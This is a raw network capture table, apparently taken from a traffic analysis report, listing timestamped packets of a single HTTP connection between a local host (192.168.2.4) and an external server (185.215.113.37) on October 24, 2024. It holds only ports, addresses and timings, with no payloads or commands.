Oct 24, 2024 19:29:19.429047108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429064035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429076910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429081917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429088116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429091930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429100037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.429141045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429146051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429152012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429157972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429200888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429205894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429313898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.429624081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429661036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.429696083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429707050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429732084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.429748058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.429857016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429910898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.429940939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429951906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.429984093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430017948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430032015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430058956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430077076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430232048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430242062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430280924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430310965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430320978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430329084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430341959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430355072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430361986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430372953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430397987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430443048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430455923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430464029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430474043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430484056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430491924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430610895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430620909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430629969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430639982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430641890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430649996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.430641890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430675030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430675030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.430687904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431117058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431166887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431276083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431288004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431298018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431308985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431324959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431332111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431335926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431343079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431359053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431385994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431417942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431430101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431438923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431464911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431483984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431488037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431494951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431504011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431513071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431535006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431560040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431683064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431694984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431704998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431715012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431725979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431735992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431746960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431750059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431756973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431771994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431773901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431792021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431796074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431807041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431829929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431829929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431840897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431871891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431927919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431941032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431951046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431961060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431966066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431972980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431982994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.431987047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.431993961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432018995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432029009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432065010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432076931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432106972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432214975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432225943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432235003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432248116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432257891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432261944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432271004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432281017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432287931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432292938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432296038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432302952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432322025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432343960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432501078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432513952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432523966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432533026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432544947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432545900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432554960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432564974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432569027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432574987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432590961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432629108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432640076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432651043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432661057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432671070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432686090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432697058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432864904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432877064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432887077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432898045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432909012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432914019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432919979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432929993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432940006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432940960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432951927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432961941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432964087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432972908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432976961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.432981968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.432993889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433003902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433023930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433043957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433214903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433233976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433243990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433253050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433263063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433270931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433276892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433281898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433290958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433291912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433301926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433310986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433311939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433322906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433332920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433332920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433346033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433355093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433358908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433372021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433393002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433543921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433556080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433564901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433574915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433584929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433593988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433595896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433605909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433614969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433617115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433625937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433625937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433638096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433653116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433676004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433731079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433758974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433769941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.433782101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.433809042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.434523106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434534073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434544086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434572935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.434602976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.434619904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434632063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434639931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434670925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.434686899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.434961081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434972048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.434982061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435003996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435014963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435028076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435040951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435053110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435061932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435071945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435096025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435101032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435111046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435120106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435131073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435143948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435151100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435154915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435163975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435175896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435179949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435184956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435200930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435206890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435235023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435369015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435391903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435405970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435412884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435416937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435424089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435436010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435460091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.435545921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435564995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.435606003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483549118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483597040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483619928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483633995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483635902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483668089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483690977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483704090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483714104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483737946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483747005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483774900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.483805895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.483824015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.519364119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.519375086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.519387007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.519453049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.545629978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.545681953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.545850992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.545861006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.545871019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.545902967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.545934916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.546267986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546291113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546302080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546314001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.546334982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.546366930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546379089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546421051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.546822071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546835899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546848059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546875954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.546895027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.546933889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546946049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.546977043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.547003031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.547940016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.547967911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.547980070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548013926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548029900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548038006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548051119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548059940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548079014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548084974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548100948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548106909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548114061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548125982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548126936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548136950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548146963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548154116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548181057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548742056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548794985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548794985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548806906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548831940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548846960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548907995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548923969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548933029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548944950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.548952103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548969030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.548983097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549063921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549074888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549086094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549096107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549101114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549112082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549144983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549149990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549160957 CEST	80	49730	185.215.113.37	192.168.2.4
